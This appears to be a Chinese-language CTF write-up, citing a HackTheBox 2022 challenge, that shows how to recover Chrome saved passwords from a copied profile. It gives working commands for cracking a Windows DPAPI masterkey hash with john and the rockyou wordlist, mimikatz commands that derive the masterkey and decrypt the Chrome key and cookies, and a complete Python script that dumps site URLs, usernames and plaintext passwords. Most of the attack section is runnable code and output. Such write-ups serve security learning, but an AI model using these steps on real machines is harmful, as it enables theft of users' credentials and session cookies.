\u5bf9\u5e94\u9ed8\u8ba4\u76ee\u5f55\uff1a\n%APPDATA%\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\n%APPDATA%\\Local\\Google\\Chrome\\User Data\\Local State\n%APPDATA%\\Roaming\\Microsoft\\Protect{sid}}\\<\/code><\/pre>\n\u8865\u5145\u63cf\u8ff0\uff1a<\/p>\n
\n- DPAPI<\/li>\n<\/ul>\n
Data Protection API\uff0c\u662fWindows\u63d0\u4f9b\u7684\u7528\u4e8e\u6570\u636e\u4fdd\u62a4\u7684\u4e00\u5957\u63a5\u53e3\u3002\n\u8fd9\u4e2a\u63a5\u53e3\u5728windows\u4e2d\u5927\u91cf\u7684\u4f7f\u7528\u6765\u52a0\u5bc6\u6570\u636e<\/code><\/pre>\n\n- DPAPI blob<\/li>\n<\/ul>\n
\u4e00\u6bb5\u5bc6\u6587\uff0c\u53ef\u4f7f\u7528Master Key\u5bf9\u5176\u89e3\u5bc6<\/code><\/pre>\n\n- masterkey <\/li>\n<\/ul>\n
64\u5b57\u8282\uff0c\u7528\u4e8e\u89e3\u5bc6DPAPI blob\n\u901a\u8fc7\u7528\u6237\u767b\u5f55\u5bc6\u7801\u3001SID\u548c16\u5b57\u8282\u968f\u673a\u6570\u52a0\u5bc6\u540e\u4fdd\u5b58\u5728masterkey file\u4e2d<\/code><\/pre>\n\n- masterkey file<\/li>\n<\/ul>\n
\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u4f4d\u4e8e%APPDATA%\\Microsoft\\Protect\\%SID%\uff0c\n\u5c5e\u4e8e\u7cfb\u7edf\u9690\u85cf\u6587\u4ef6\uff0c\u53ef\u4f7f\u7528\u7528\u6237\u767b\u5f55\u5bc6\u7801\u5bf9\u5176\u89e3\u5bc6\uff0c\u83b7\u5f97Master Key<\/code><\/pre>\nChrome\u4f7f\u7528GCM\u6a21\u5f0f\u7684AES\u7b97\u6cd5\uff0c\u5229\u7528DPAPI\u7684CryptProtectData\u51fd\u6570\uff0c\u5e76\u914d\u5408\u5f53\u524d\u7528\u6237\u7684\u5bc6\u7801\u4fdd\u62a4\u6570\u636e\u2014\u2014\u56e0\u6b64\u53ea\u6709\u5177\u6709\u4e0e\u52a0\u5bc6\u6570\u636e\u7528\u6237\u7684\u767b\u5f55\u51ed\u636e\u5339\u914d\u7684\u7528\u6237\u624d\u80fd\u89e3\u5bc6\u6570\u636e\uff08\u4e5f\u5c31\u662f\u9700\u8981masterkey\uff09\uff0c\u5355\u5355\u5229\u7528CryptUnprotectData\u51fd\u6570\u53ea\u80fd\u89e3\u5bc6\u672c\u673a\u7684Chrome\u5bc6\u7801\u3002<\/p>\n
\u90a3\u4e48\u5f53\u6211\u4eec\u89e3\u7684\u4e0d\u662f\u672c\u673a\u7684Chrome\u5bc6\u7801\uff0c\u53ea\u6709Chrome\u914d\u7f6e\u6587\u4ef6\u6ca1\u6709\u5bf9\u5e94masterkey\u5e94\u8be5\u600e\u4e48\u8fd8\u539f\u5bc6\u7801\u5462\uff1f<\/em><\/p>\n\u65b9\u6cd5\u5982\u4e0b\uff1a<\/p>\n
Step1\u3001\u7528DPAPImk2john.py<\/a>\u63d0\u53d6\u7528\u6237\u7684 hash \u503c<\/h3>\npython DPAPImk2john.py --sid="S-1-5-21-440314382-4097440215-1133304494-1002" --masterkey="S-1-5-21-440314382-4097440215-1133304494-1002\/4b730283-9406-461f-ac8d-689738b97400" --context="local" > hash.txt<\/code><\/pre>\n![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/12\/c1.png\")
<\/p>\n
step2\u3001\u5728 kali \u4f7f\u7528 john \u7684 rockyou \u5b57\u5178\u7206\u7834\u5bc6\u7801<\/h3>\njohn hash.txt -wordlist=\/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/12\/c2.png\")
<\/p>\n
\u5f97\u5230\u7528\u6237\u5bc6\u7801\uff1abreakers<\/p>\n
step3\u3001\u5728 mimikatz \u5229\u7528\u7528\u6237\u5bc6\u7801\u83b7\u53d6 masterkey<\/h3>\ndpapi::masterkey \/in:S-1-5-21-440314382-4097440215-1133304494-1002\/4b730283-9406-461f-ac8d-689738b97400 \/sid:S-1-5-21-440314382-4097440215-1133304494-1002 \/password:breakers \/protected<\/code><\/pre>\n![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/12\/c3.png\")
<\/p>\n
PS\uff1a\u5982\u679c\u8fd8\u6709 Cookies \u6587\u4ef6\uff0c\u6b64\u65f6\u53ef\u4ee5\u76f4\u63a5\u7528 masterkey \u89e3<\/h3>\ndpapi::chrome \/in:"Cookies" \/unprotect \/masterkey:7a4d2ffbb42d0a1ab46f0351260aef16cae699e03e9d6514b3bf10e2977c5d228fda4a48e39b7b8a06a443c39653c2a3c3656596e7edc84e1c9682511c8343ac<\/code><\/pre>\n![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/12\/c8.png\")
<\/p>\n
step4\u3001\u63d0\u53d6 Login State \u4e2d\u7684 DPAPI blob<\/h3>\nimport json\nimport base64\n\nfh = open('AppData\/Local\/Google\/Chrome\/User Data\/Local State', 'rb')\nencrypted_key = json.load(fh)\n\nencrypted_key = encrypted_key['os_crypt']['encrypted_key']\n\ndecrypted_key = base64.b64decode(encrypted_key)\n\nopen("dec_data",'wb').write(decrypted_key[5:])<\/code><\/pre>\nstep5\u3001\u5728 mimikatz \u5229\u7528 masterkey \u89e3\u5bc6 DPAPI blob\uff0c\u83b7\u5f97AES\u5bc6\u94a5<\/h3>\ndpapi::blob \/masterkey:93fde93933480b9125aa4817730ad96ad5851e5d0b5c11cc70aab4e8b55ca0f426a366e5de5cc8237ec1a5f73b0d5df8c5b11a2c8409df92e2b3d34a9914781d \/in:"dec_data" \/out:aes.dec<\/code><\/pre>\n![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/12\/c4.png\")
<\/p>\n
step6\u3001\u5229\u7528AES\u5bc6\u94a5\u8fd8\u539f Chrome \u8d26\u53f7\u5bc6\u7801<\/h3>\nimport os\nimport re\nimport sys\nimport json\nimport base64\nimport sqlite3\nimport win32crypt\nfrom Cryptodome.Cipher import AES\nimport shutil\nimport csv\n\ndef get_secret_key():\n secret_key = open('aes.dec', 'rb').read()\n return secret_key\n\ndef decrypt_payload(cipher, payload):\n return cipher.decrypt(payload)\n\ndef generate_cipher(aes_key, iv):\n return AES.new(aes_key, AES.MODE_GCM, iv)\n\ndef decrypt_password(ciphertext, secret_key):\n try:\n initialisation_vector = ciphertext[3:15]\n encrypted_password = ciphertext[15:-16]\n cipher = generate_cipher(secret_key, initialisation_vector)\n decrypted_pass = decrypt_payload(cipher, encrypted_password)\n decrypted_pass = decrypted_pass.decode()\n return decrypted_pass\n except Exception as e:\n print("%s"%str(e))\n print("[ERR] Unable to decrypt, Chrome version <80 not supported. Please check.")\n return ""\n\ndef get_db_connection(chrome_path_login_db):\n try:\n return sqlite3.connect(chrome_path_login_db)\n except Exception as e:\n print("%s"%str(e))\n print("[ERR] Chrome database cannot be found")\n return None\n\nif __name__ == '__main__':\n secret_key = get_secret_key()\n # chrome_path_login_db = r"AppData\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"\n chrome_path_login_db = r"Login Data"\n conn = get_db_connection(chrome_path_login_db)\n if(secret_key and conn):\n cursor = conn.cursor()\n cursor.execute("SELECT action_url, username_value, password_value FROM logins")\n for index,login in enumerate(cursor.fetchall()):\n url = login[0]\n username = login[1]\n ciphertext = login[2]\n # if(url!="" and username!="" and ciphertext!=""):\n decrypted_password = decrypt_password(ciphertext, secret_key)\n print("Sequence: %d"%(index))\n print("URL: %s\\nUser Name: %s\\nPassword: %s\\n"%(url,username,decrypted_password))\n print("*"*50)\n cursor.close()\n conn.close()\n else:\n print("error1")<\/code><\/pre>\n![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/12\/c5.png\")
<\/p>\n
\u5f97\u5230\u5bc6\u7801981f4821-2cc4-459e-8528-4b2c111a7b52<\/code><\/p>\nPS\uff1a\u4e5f\u53ef\u4ee5\u5728step2\u5f97\u5230\u7528\u6237\u5bc6\u7801\u540e\uff0c\u76f4\u63a5\u4f7f\u7528chromepass\u5de5\u5177\u76f4\u63a5\u89e3\u5bc6\u5bc6\u7801<\/h3>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/12\/c6.png\")
<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/12\/c7.png\")
<\/p>\n
\u53c2\u8003\u6587\u7ae0\uff1a<\/p>\n
CA CTF 2022: Using pentesting techniques to decrypt Chrome\u2019s passwords - Seized (hackthebox.com)<\/a><\/p>\n